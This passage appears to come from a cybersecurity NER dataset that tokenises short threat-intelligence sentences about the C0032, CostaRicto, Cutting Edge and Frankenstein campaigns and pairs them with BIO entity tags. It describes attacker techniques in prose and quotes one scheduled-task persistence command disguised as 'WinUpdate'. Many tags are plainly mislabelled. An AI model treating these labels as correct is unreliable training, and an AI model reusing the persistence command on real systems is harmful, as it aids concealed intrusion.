"O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "relied", - "on", - "encrypted", - "SSH-based", - "tunnels", - "to", - "transfer", - "tools", - "and", - "for", - "remote", - "command/program", - "execution." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "scheduled", - "task", - "XML", - "triggers." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "timestomping", - "to", - "modify", - "the", - "<code>$STANDARD_INFORMATION</code>", - "attribute", - "on", - "tools." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz", - "and", - "PsExec." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "compromised", - "VPN", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "Virtual", - "Private", - "Server", - "(VPS)", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "planted", - "Web", - "shells", - "on", - "Outlook", - "Exchange", - "servers." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "collected", - "data", - "and", - "files", - "from", - "compromised", - "networks." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "CostaRicto,", - "the", - "threat", - "actors", - "established", - "domains,", - "some", - "of", - "which", - "appeared", - "to", - "spoof", - "legitimate", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "set", - "up", - "remote", - "tunneling", - "using", - "an", - "SSH", - "tool", - "to", - "maintain", - "access", - "to", - "a", - "compromised", - "environment." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "downloaded", - "malware", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "CostaRicto,", - "the", - "threat", - "actors", - "used", - "custom", - "malware,", - "including", - "PS1,", - "CostaBricks,", - "and", - "SombRAT." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "used", - "a", - "layer", - "of", - "proxies", - "to", - "manage", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "employed", - "nmap", - "and", - "pscan", - "to", - "scan", - "target", - "environments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "set", - "up", - "remote", - "SSH", - "tunneling", - "into", - "the", - "victim's", - "environment", - "from", - "a", - "malicious", - "domain." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "used", - "scheduled", - "tasks", - "to", - "download", - "backdoor", - "tools." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "CostaRicto,", - "the", - "threat", - "actors", - "obtained", - "open", - "source", - "tools", - "to", - "use", - "in", - "their", - "operations." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "saved", - "collected", - "data", - "to", - "a", - "tar", - "archive." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "Perl", - "scripts", - "to", - "enable", - "the", - "deployment", - "of", - "the", - "THINSPOOL", - "shell", - "script", - "dropper", - "and", - "for", - "enumerating", - "host", - "data." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "trojanized", - "legitimate", - "files", - "in", - "Ivanti", - "Connect", - "Secure", - "appliances", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "DNS", - "to", - "tunnel", - "IPv4", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "stole", - "the", - "running", - "configuration", - "and", - "cache", - "data", - "from", - "targeted", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "disabled", - "logging", - "and", - "modified", - "the", - "`compcheckresult.cgi`", - "component", - "to", - "edit", - "the", - "Ivanti", - "Connect", - "Secure", - "built-in", - "Integrity", - "Checker", - "exclusion", - "list", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "compromised", - "VPN", - "accounts", - "for", - "lateral", - "movement", - "on", - "targeted", - "networks." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "a", - "Base64-encoded", - "Python", - "script", - "to", - "write", - "a", - "patched", - "version", - "of", - "the", - "Ivanti", - "Connect", - "Secure", - "`dsls`", - "binary." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "exploited", - "CVE-2023-46805", - "and", - "CVE-2024-21887", - "in", - "Ivanti", - "Connect", - "Secure", - "VPN", - "appliances", - "to", - "enable", - "authentication", - "bypass", - "and", - "command", - "injection.", - "A", - "server-side", - "request", - "forgery", - "(SSRF)", - "vulnerability,", - "CVE-2024-21893,", - "was", - "identified", - "later", - "and", - "used", - "to", - "bypass", - "mitigations", - "for", - "the", - "initial", - "two", - "vulnerabilities", - "by", - "chaining", - "with", - "CVE-2024-21887." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "deleted", - "`/tmp/test1.txt`", - "on", - "compromised", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "which", - "was", - "used", - "to", - "hold", - "stolen", - "configuration", - "and", - "cache", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "cleared", - "logs", - "to", - "remove", - "traces", - "of", - "their", - "activity", - "and", - "restored", - "compromised", - "systems", - "to", - "a", - "clean", - "state", - "to", - "bypass", - "manufacturer", - "mitigations", - "for", - "CVE-2023-46805", - "and", - "CVE-2024-21887." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "leveraged", - "exploits", - "to", - "download", - "remote", - "files", - "to", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "modified", - "a", - "JavaScript", - "file", - "on", - "the", - "Web", - "SSL", - "VPN", - "component", - "of", - "Ivanti", - "Connect", - "Secure", - "devices", - "to", - "keylog", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "Task", - "Manager", - "to", - "dump", - "LSASS", - "memory", - "from", - "Windows", - "devices", - "to", - "disk." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "accessed", - "and", - "mounted", - "virtual", - "hard", - "disk", - "backups", - "to", - "extract", - "ntds.dit." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "compromised", - "and", - "out-of-support", - "Cyberoam", - "VPN", - "appliances", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-Org", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "the", - "Unix", - "socket", - "and", - "a", - "reverse", - "TCP", - "shell", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "malicious", - "SparkGateway", - "plugins", - "to", - "inject", - "shared", - "objects", - "into", - "web", - "process", - "memory", - "on", - "compromised", - "Ivanti", - "Secure", - "Connect", - "VPNs", - "to", - "enable", - "deployment", - "of", - "backdoors." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "Iodine", - "to", - "tunnel", - "IPv4", - "traffic", - "over", - "DNS." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "a", - "Python", - "reverse", - "shell", - "and", - "the", - "PySoxy", - "SOCKS5", - "proxy", - "tool." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "RDP", - "with", - "compromised", - "credentials", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "B-Org", - "B-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "moved", - "laterally", - "using", - "compromised", - "credentials", - "to", - "connect", - "to", - "internal", - "Windows", - "systems", - "with", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "SSH", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "peformed", - "reconnaissance", - "of", - "victims'", - "internal", - "websites", - "via", - "proxied", - "connections." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "the", - "ENUM4LINUX", - "Perl", - "script", - "for", - "discovery", - "on", - "Windows", - "and", - "Samba", - "hosts." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "changed", - "timestamps", - "of", - "multiple", - "files", - "on", - "compromised", - "Ivanti", - "Secure", - "Connect", - "VPNs", - "to", - "conceal", - "malicious", - "activity." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "leveraged", - "tools", - "including", - "Interactsh", - "to", - "identify", - "vulnerable", - "targets,", - "PySoxy", - "to", - "simultaneously", - "dispatch", - "traffic", - "between", - "multiple", - "endpoints,", - "BusyBox", - "to", - "enable", - "post", - "exploitation", - "activities,", - "and", - "Kubo", - "Injector", - "to", - "inject", - "shared", - "objects", - "into", - "process", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "sent", - "a", - "magic", - "48-byte", - "sequence", - "to", - "enable", - "the", - "PITSOCK", - "backdoor", - "to", - "communicate", - "via", - "the", - "`/tmp/clientsDownload.sock`", - "socket." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "the", - "publicly", - "available", - "Interactsh", - "tool", - "to", - "identify", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "vulnerable", - "to", - "CVE-2024-21893." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "modified", - "the", - "JavaScript", - "loaded", - "by", - "the", - "Ivanti", - "Connect", - "Secure", - "login", - "page", - "to", - "capture", - "credentials", - "entered." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Cutting", - "Edge,", - "threat", - "actors", - "used", - "multiple", - "web", - "shells", - "to", - "maintain", - "presence", - "on", - "compromised", - "Connect", - "Secure", - "appliances", - "such", - "as", - "WIREFIRE,", - "GLASSTOKEN,", - "BUSHWALK,", - "LIGHTWIRE,", - "and", - "FRAMESTING." - ], - "ner_tags": [ - "O", - "B-Org", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "automatically", - "gather", - "the", - "username,", - "domain", - "name,", - "machine", - "name,", - "and", - "other", - "system", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "collected", - "information", - "via", - "Empire,", - "which", - "was", - "automatically", - "sent", - "back", - "to", - "the", - "adversary's", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "ran", - "encoded", - "commands", - "from", - "the", - "command", - "line." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "gather", - "various", - "local", - "system", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "B-Features", - "B-Purp" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "deobfuscated", - "Base64-encoded", - "commands", - "following", - "the", - "execution", - "of", - "a", - "malicious", - "script,", - "which", - "revealed", - "a", - "small", - "script", - "designed", - "to", - "obtain", - "an", - "additional", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "collected", - "information", - "via", - "Empire,", - "which", - "sent", - "the", - "data", - "back", - "to", - "the", - "adversary's", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "exploited", - "CVE-2017-11882", - "to", - "execute", - "code", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "downloaded", - "files", - "and", - "tools", - "onto", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "MSbuild", - "to", - "execute", - "an", - "actor-created", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "relied", - "on", - "a", - "victim", - "to", - "enable", - "macros", - "within", - "a", - "malicious", - "Microsoft", - "Word", - "document", - "likely", - "sent", - "via", - "email." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "named", - "a", - "malicious", - "scheduled", - "task", - "\"WinUpdate\"", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "PowerShell", - "to", - "run", - "a", - "series", - "of", - "Base64-encoded", - "commands", - "that", - "acted", - "as", - "a", - "stager", - "and", - "enumerated", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "obtain", - "a", - "list", - "of", - "all", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "established", - "persistence", - "through", - "a", - "scheduled", - "task", - "using", - "the", - "command:", - "`/Create", - "/F", - "/SC", - "DAILY", - "/ST", - "09:00", - "/TN", - "WinUpdate", - "/TR`,", - "named", - "\"WinUpdate\"" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "WMI", - "queries", - "to", - "determine", - "if", - "analysis", - "tools", - "were", - "running", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "likely", - "used", - "spearphishing", - "emails", - "to", - "send", - "malicious", - "Microsoft", - "Word", - "documents." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "communicated", - "with", - "C2", - "via", - "an", - "encrypted", - "RC4", - "byte", - "stream", - "and", - "AES-CBC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "a", - "script", - "that", - "ran", - "WMI", - "queries", - "to", - "check", - "if", - "a", - "VM", - "or", - "sandbox", - "was", - "running,", - "including", - "VMWare", - "and", - "Virtualbox.", - "The", - "script", - "would", - "also", - "call", - "WMI", - "to", - "determine", - "the", - "number", - "of", - "cores", - "allocated", - "to", - "the", - "system;", - "if", - "less", - "than", - "two", - "the", - "script", - "would", - "stop", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "obtain", - "the", - "compromised", - "machine's", - "name." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "find", - "the", - "public", - "IP", - "address", - "of", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Empire", - "to", - "enumerate", - "hosts", - "and", - "gather", - "username,", - "machine", - "name,", - "and", - "administrative", - "permissions", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "trojanized", - "documents", - "that", - "retrieved", - "remote", - "templates", - "from", - "an", - "adversary-controlled", - "website." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Frankenstein,", - "the", - "threat", - "actors", - "obtained", - "and", - "used", - "Empire." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "Word", - "documents", - "that", - "prompted", - "the", - "victim", - "to", - "enable", - "macros", - "and", - "run", - "a", - "Visual", - "Basic", - "script." - ], - "ner_tags": [ - "O", - "O", - "O", - 